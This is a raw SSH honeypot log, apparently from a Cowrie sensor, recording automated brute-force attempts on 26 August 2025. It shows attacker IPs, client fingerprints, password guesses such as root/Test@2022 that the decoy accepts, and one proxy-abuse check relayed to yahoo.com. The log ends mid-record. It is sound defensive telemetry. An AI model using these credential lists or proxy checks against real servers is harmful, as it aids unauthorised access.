{"eventid":"cowrie.login.failed","username":"root","fingerprint":"19:bf:10:d7:8e:5f:95:08:c0:27:de:39:0d:15:da:54","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC69p6u0xvnBRcSMatDUAlflsayJHp3y3oKQEwChJvGGB3bJvVFL3YxuO/ZKyssjGUDv9R+8tBJVqd4kpEPZniPmndHCX4eDFB4gxG1sL7UsNR8yxY2QciMAf151vK51cckT8219DolaRkrjtOyUpj6g59Qwu76+3GWEyYOevE1x5fPqI5PCYBgE+uKL+Gd9FVutGnbjjWjBf9N3G4yHEgy7pR9DKVH90KnwKuaptqPeP5GFLSTVmslvN7h9j5i9Vz2YsTx1XclI2VKaPHObW30LGOAXOqtYo2dvN7h3rdCg/ijw8eUb0ELPHl6o6s4r2IkbLOtthBifhLUV0JgFOb5","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T10:14:43.604381Z","src_ip":"139.19.117.131","session":"82ff494d6d5c"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"19:bf:10:d7:8e:5f:95:08:c0:27:de:39:0d:15:da:54","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC69p6u0xvnBRcSMatDUAlflsayJHp3y3oKQEwChJvGGB3bJvVFL3YxuO/ZKyssjGUDv9R+8tBJVqd4kpEPZniPmndHCX4eDFB4gxG1sL7UsNR8yxY2QciMAf151vK51cckT8219DolaRkrjtOyUpj6g59Qwu76+3GWEyYOevE1x5fPqI5PCYBgE+uKL+Gd9FVutGnbjjWjBf9N3G4yHEgy7pR9DKVH90KnwKuaptqPeP5GFLSTVmslvN7h9j5i9Vz2YsTx1XclI2VKaPHObW30LGOAXOqtYo2dvN7h3rdCg/ijw8eUb0ELPHl6o6s4r2IkbLOtthBifhLUV0JgFOb5","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 19:bf:10:d7:8e:5f:95:08:c0:27:de:39:0d:15:da:54","sensor":"my-vps","timestamp":"2025-08-26T10:14:43.625892Z","src_ip":"139.19.117.131","session":"82ff494d6d5c"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"19:bf:10:d7:8e:5f:95:08:c0:27:de:39:0d:15:da:54","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC69p6u0xvnBRcSMatDUAlflsayJHp3y3oKQEwChJvGGB3bJvVFL3YxuO/ZKyssjGUDv9R+8tBJVqd4kpEPZniPmndHCX4eDFB4gxG1sL7UsNR8yxY2QciMAf151vK51cckT8219DolaRkrjtOyUpj6g59Qwu76+3GWEyYOevE1x5fPqI5PCYBgE+uKL+Gd9FVutGnbjjWjBf9N3G4yHEgy7pR9DKVH90KnwKuaptqPeP5GFLSTVmslvN7h9j5i9Vz2YsTx1XclI2VKaPHObW30LGOAXOqtYo2dvN7h3rdCg/ijw8eUb0ELPHl6o6s4r2IkbLOtthBifhLUV0JgFOb5","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T10:14:43.626786Z","src_ip":"139.19.117.131","session":"82ff494d6d5c"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:14:53.545454Z","src_ip":"139.19.117.131","session":"82ff494d6d5c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":50892,"dst_ip":"1.2.3.4","dst_port":22,"session":"5011199d46c1","protocol":"ssh","message":"New connection: 196.251.86.249:50892 (1.2.3.4:22) [session: 5011199d46c1]","sensor":"my-vps","timestamp":"2025-08-26T10:14:59.592072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:15:00.220215Z","src_ip":"196.251.86.249","session":"5011199d46c1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:15:00.221109Z","src_ip":"196.251.86.249","session":"5011199d46c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55456,"dst_ip":"1.2.3.4","dst_port":22,"session":"087b682481a7","protocol":"ssh","message":"New connection: 212.227.235.229:55456 (1.2.3.4:22) [session: 087b682481a7]","sensor":"my-vps","timestamp":"2025-08-26T10:15:01.163662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:15:02.639915Z","src_ip":"212.227.235.229","session":"087b682481a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:15:02.640877Z","src_ip":"212.227.235.229","session":"087b682481a7"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"pass","message":"login attempt [oracle/pass] failed","sensor":"my-vps","timestamp":"2025-08-26T10:15:02.947899Z","src_ip":"196.251.86.249","session":"5011199d46c1"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:15:04.564015Z","src_ip":"196.251.86.249","session":"5011199d46c1"}
{"eventid":"cowrie.login.success","username":"root","password":"12357111317","message":"login attempt [root/12357111317] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:15:06.995711Z","src_ip":"212.227.235.229","session":"087b682481a7"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:15:07.839403Z","src_ip":"212.227.235.229","session":"087b682481a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48346,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6087c51648a","protocol":"ssh","message":"New connection: 212.227.235.229:48346 (1.2.3.4:22) [session: f6087c51648a]","sensor":"my-vps","timestamp":"2025-08-26T10:15:30.722773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:15:30.831544Z","src_ip":"212.227.235.229","session":"f6087c51648a"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T10:15:31.120013Z","src_ip":"212.227.235.229","session":"f6087c51648a"}
{"eventid":"cowrie.login.failed","username":"developer","password":"password","message":"login attempt [developer/password] failed","sensor":"my-vps","timestamp":"2025-08-26T10:15:32.053521Z","src_ip":"212.227.235.229","session":"f6087c51648a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:15:33.366147Z","src_ip":"212.227.235.229","session":"f6087c51648a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62824,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3adc3b3a882","protocol":"ssh","message":"New connection: 213.209.150.239:62824 (1.2.3.4:22) [session: f3adc3b3a882]","sensor":"my-vps","timestamp":"2025-08-26T10:15:37.536034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:15:37.536808Z","src_ip":"213.209.150.239","session":"f3adc3b3a882"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T10:15:37.584151Z","src_ip":"213.209.150.239","session":"f3adc3b3a882"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:15:37.819590Z","src_ip":"213.209.150.239","session":"f3adc3b3a882"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":24945,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:24945","sensor":"my-vps","timestamp":"2025-08-26T10:15:37.867936Z","session":"f3adc3b3a882"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T10:15:37.915443Z","src_ip":"213.209.150.239","session":"f3adc3b3a882"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":24188,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24188","sensor":"my-vps","timestamp":"2025-08-26T10:15:38.053942Z","session":"f3adc3b3a882"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T10:15:38.101614Z","src_ip":"213.209.150.239","session":"f3adc3b3a882"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:15:38.149881Z","src_ip":"213.209.150.239","session":"f3adc3b3a882"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":51656,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9d1364be7c5","protocol":"ssh","message":"New connection: 196.251.86.249:51656 (1.2.3.4:22) [session: c9d1364be7c5]","sensor":"my-vps","timestamp":"2025-08-26T10:16:02.769716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:16:03.330009Z","src_ip":"196.251.86.249","session":"c9d1364be7c5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:16:03.330807Z","src_ip":"196.251.86.249","session":"c9d1364be7c5"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"P@ssw0rd","message":"login attempt [oracle/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T10:16:05.518298Z","src_ip":"196.251.86.249","session":"c9d1364be7c5"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:16:07.087395Z","src_ip":"196.251.86.249","session":"c9d1364be7c5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":52400,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e86882d64c6","protocol":"ssh","message":"New connection: 196.251.86.249:52400 (1.2.3.4:22) [session: 9e86882d64c6]","sensor":"my-vps","timestamp":"2025-08-26T10:17:07.042099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:17:07.533620Z","src_ip":"196.251.86.249","session":"9e86882d64c6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:17:07.534334Z","src_ip":"196.251.86.249","session":"9e86882d64c6"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:17:09.036477Z","src_ip":"196.251.86.249","session":"9e86882d64c6"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:17:10.390143Z","src_ip":"196.251.86.249","session":"9e86882d64c6"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":34948,"dst_ip":"1.2.3.4","dst_port":22,"session":"7483478dac5e","protocol":"ssh","message":"New connection: 93.123.109.189:34948 (1.2.3.4:22) [session: 7483478dac5e]","sensor":"my-vps","timestamp":"2025-08-26T10:17:16.513433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:17:16.514168Z","src_ip":"93.123.109.189","session":"7483478dac5e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T10:17:16.533659Z","src_ip":"93.123.109.189","session":"7483478dac5e"}
{"eventid":"cowrie.login.failed","username":"solv","password":"12345678","message":"login attempt [solv/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T10:17:16.593936Z","src_ip":"93.123.109.189","session":"7483478dac5e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:17:17.616551Z","src_ip":"93.123.109.189","session":"7483478dac5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49590,"dst_ip":"1.2.3.4","dst_port":22,"session":"39c5375ac5da","protocol":"ssh","message":"New connection: 212.227.235.229:49590 (1.2.3.4:22) [session: 39c5375ac5da]","sensor":"my-vps","timestamp":"2025-08-26T10:17:20.619850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:17:20.663476Z","src_ip":"212.227.235.229","session":"39c5375ac5da"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@